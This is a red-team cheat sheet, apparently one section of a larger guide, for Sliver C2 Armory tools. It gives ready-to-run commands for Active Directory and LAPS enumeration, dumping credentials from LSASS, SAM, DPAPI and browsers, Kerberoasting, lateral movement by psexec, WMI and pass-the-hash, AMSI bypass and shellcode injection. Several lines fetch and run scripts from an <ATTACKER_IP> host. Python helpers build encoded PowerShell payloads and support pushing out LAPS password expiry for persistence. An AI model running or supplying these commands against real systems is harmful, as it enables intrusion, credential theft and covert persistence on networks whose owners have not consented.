Armory Reference
Grouped quick-reference for Sliver Armory tools by use case. Install with armory install all.
Enumeration
# Active Directory
sharp-hound-4 -- '-c all'
sharpview -- 'Get-DomainComputer -Properties ms-mcs-admpwd'
# Host enumeration
seatbelt -- -group=all
seatbelt -- -group=user
# Privilege checks
sharpup -- audit
sa-whoami
# NoPowerShell (limited cmdlets)
nps 'Get-ADUser -Filter *'
nps Get-Command
# Network
sa-netstat
sa-ipconfig
sa-arp
sa-nslookup
sa-routeprint
# Services
sa-sc-enum
sa-sc-qc
sa-schtasksenum
# LAPS
sharplaps /host:DC01 /target:CLIENT01
sharpview -- 'Get-DomainComputer -Properties ms-mcs-admpwd,ms-mcs-admpwdexpirationtime'
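The ms-mcs-admpwdexpirationtime value that SharpView or ldapsearch return is a raw Windows FILETIME (100-nanosecond ticks since 1601-01-01 UTC, delivered as a decimal string), so it is not obvious at a glance whether a LAPS password you can read is still current. The helper below is an added example, not Sliver or Armory code, and the computer rows it processes are constructed to mirror the shape of the SharpView output; the hypothetical reference time is fixed so the result is reproducible:

```python
# Added example (not part of the Sliver Armory or any tool it ships):
# decode ms-Mcs-AdmPwdExpirationTime FILETIME values and classify LAPS rows.
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # one FILETIME tick is 100 ns


def filetime_to_datetime(value):
    """Convert a FILETIME (int, or the decimal string LDAP returns) to an aware UTC datetime."""
    ticks = int(value)
    if ticks < 0:
        raise ValueError("FILETIME cannot be negative")
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    """Inverse conversion, done in integer arithmetic to avoid float rounding at 1e17 ticks."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


# Constructed rows in the shape of
#   sharpview -- 'Get-DomainComputer -Properties name,ms-mcs-admpwd,ms-mcs-admpwdexpirationtime'
# The password string and the tick values are made up for illustration.
SAMPLE_ROWS = [
    {"name": "CLIENT01", "ms-mcs-admpwd": "r4nd0m-LAPS-pw",
     "ms-mcs-admpwdexpirationtime": "133485408000000000"},   # 2024-01-01T00:00:00Z
    {"name": "CLIENT02", "ms-mcs-admpwdexpirationtime": "134000000000000000"},  # Aug 2025
    {"name": "SRV01"},  # no LAPS attributes visible at all
]


def laps_status(rows, now):
    """Per host: can we read the password, when does it expire, and has that time passed?

    An absent ms-mcs-admpwd means either LAPS is not deployed on that host or
    our principal lacks read rights on the attribute; the two look identical
    from LDAP. An expiry in the past does not mean the password has changed:
    the LAPS client side rotates it on its next Group Policy refresh.
    """
    report = []
    for row in rows:
        exp_raw = row.get("ms-mcs-admpwdexpirationtime")
        exp = filetime_to_datetime(exp_raw) if exp_raw else None
        report.append({
            "name": row["name"],
            "password_readable": "ms-mcs-admpwd" in row,
            "expires": exp.isoformat() if exp else None,
            "expired": exp is not None and exp <= now,
        })
    return report


def demo_report():
    # Hypothetical "current time" so the classification is deterministic.
    return laps_status(SAMPLE_ROWS, now=datetime(2024, 6, 1, tzinfo=timezone.utc))


if __name__ == "__main__":
    for entry in demo_report():
        print(entry)
```

The Unix epoch is FILETIME 116444736000000000, which is a handy sanity check for the conversion; datetime_to_filetime is there for the case where you hold write rights on the attribute and want to push the expiry out (the standard LAPS abuse for persistence), since the value you write must be in the same tick format.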
# LDAP
sa-ldapsearch
ldapsigncheck

Credential Access
# SAM dump (remote)
sharpsecdump -- -target=host.domain.com -u=Administrator -d=. -p='password'
# DPAPI
sharpdpapi credentials
sharpdpapi vaults
sharpdpapi masterkeys /hashes:<NTLM_HASH>
sharpdpapi machinemasterkeys
# Kerberos
rubeus -- tgtdeleg /nowrap
rubeus -t 30 -- monitor /interval:5 /runfor:15 /nowrap
bof-roast
c2tc-kerberoast
tgtdelegation
# LSASS
nanodump
handlekatz
mimikatz
# Browser
chromiumkeydump
go-cookie-monster
# Credential Manager
credman

Privilege Escalation
# Audit for privesc vectors
sharpup -- audit
sharpup -i -- audit
# PowerUp (via SharpSh)
sharpsh -t 40 -- '-u http://<ATTACKER_IP>/PowerUp.ps1 -c "Invoke-AllChecks"'
# Service ACL check
sharpsh -t 20 -- '-u http://<ATTACKER_IP>/Get-ServiceAcl.ps1 -c "Get-ServiceAcl -Name SNMPTRAP | select -expand Access"'

Lateral Movement
# PSExec (BOF)
jump-psexec <TARGET> AgentSvc /path/to/payload.exe //<TARGET>/c$/file.exe
# WMI Exec (BOF)
jump-wmiexec <TARGET> 'powershell -enc <BASE64_PAYLOAD>'
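The <BASE64_PAYLOAD> in the jump-wmiexec line above is consumed by PowerShell's -EncodedCommand, which decodes it as UTF-16LE; base64 of the UTF-8 text is the usual mistake and produces a parse error full of unreadable characters on the target, after a remote exec you cannot easily retry quietly. The helper below is an added example, not Sliver or Armory code, that builds the argument and checks a blob before it is sent; the command string it encodes is constructed:

```python
# Added example (not part of Sliver or any Armory tool): produce and verify the
# UTF-16LE base64 that 'powershell -enc' expects.
import base64


def encode_powershell(command):
    """Return the -EncodedCommand argument for a PowerShell command string."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob):
    """Inverse; raises if the blob is not valid base64 or not even-length UTF-16LE."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE (was the text encoded as UTF-8?)")
    return raw.decode("utf-16-le")


def looks_like_utf16_powershell(blob):
    """Pre-flight check for ASCII-only commands (the common case).

    ASCII text in UTF-16LE has a 0x00 in every odd byte; a blob made from UTF-8
    has none, so it fails here even though base64 itself decodes fine.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return len(raw) > 0 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def build_wmiexec_command(command):
    """The quoted argument the jump-wmiexec line on this page takes (flags are the page's)."""
    blob = encode_powershell(command)
    assert looks_like_utf16_powershell(blob)
    return f"powershell -enc {blob}"


if __name__ == "__main__":
    # Constructed command; "whoami" is just the smallest thing worth running.
    print(build_wmiexec_command("whoami"))
```

The check is deliberately narrow: a command containing non-ASCII characters (smart quotes pasted from a document are the typical way that happens) will have non-zero high bytes and fail it, which is a good moment to look at the command anyway.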
# SharpRDP
sharprdp -- computername=<TARGET> username=<DOMAIN>\\<USER> password=<PASS> command=C:\\path\\to\\payload.exe
# SharpWMI
sharp-wmi action=exec computername=<TARGET> command=C:\\path\\to\\payload.exe result=true amsi=disable
# SMBExec
sharp-smbexec hash:"<NTLM>" username:"Administrator" domain:"domain.tld" target:"target.domain.tld" command:"command"
# SharpMapExec (enable WinRM)
sharpmapexec -- 'ntlm winrm /user:Administrator /password:"password" /domain:. /computername:<TARGET> /m:enable_winrm'
# File upload + token impersonation
make-token -d <DOMAIN> -u Administrator -p 'password'
upload /path/to/payload.exe //<TARGET>/c$/windows/temp/payload.exe

Execution Helpers
# AMSI/CLM bypass (SharpSh)
sharpsh -t 20 -- '-c "whoami /all"'
sharpsh -t 200 -- '-u http://<ATTACKER_IP>/script.ps1 -c "Invoke-Command"'
sharpsh -- -e -c <BASE64_COMMAND>
# In-process execution (bypass AppLocker)
execute-assembly -i /path/to/tool.exe args
inline-execute-assembly /path/to/tool.exe args
# Process injection
hollow svchost.exe /path/to/shellcode.bin
migrate -p <PID>
execute-shellcode -p <PID> /path/to/shellcode.bin
# Token manipulation
make-token -d <DOMAIN> -u <USER> -p '<PASS>'
runas -d <DOMAIN> -u <USER> -P '<PASS>' -n -p C:\\path\\to\\payload.exe
getsystem

Armory Bundles
| Bundle | Key Tools |
|---|---|
| .net-execute | sharp-smbexec, sharp-wmi, sharpmapexec, sharprdp, sharpsh, nopowershell |
| .net-pivot | rubeus, certify, sharpsecdump, sharpchrome, sharpdpapi, sqlrecon |
| .net-recon | seatbelt, sharpup, sharpview, sharp-hound-3/4 |
| situational-awareness | sa-whoami, sa-netstat, sa-ipconfig, sa-ldapsearch, sa-schtasksenum, etc. |
| windows-bypass | inject-amsi-bypass, inject-etw-bypass, unhook-bof, patchit |
| windows-credentials | nanodump, credman, chromiumkeydump, handlekatz, mimikatz |
| windows-inject | hollow, secinject, threadless-inject, various injection BOFs |
| kerberos | bof-roast, nanorobeus, tgtdelegation, kerbrute |
| c2-tool-collection | Outflank BOFs: domaininfo, kerberoast, petitpotam, spray-ad, wdtoggle |
| cs-remote-ops-bofs | Remote: psexec, adduser, sc-create/start/stop, schtasks, reg ops |
See also: 2. Client Setup, 3. Beacons & Listeners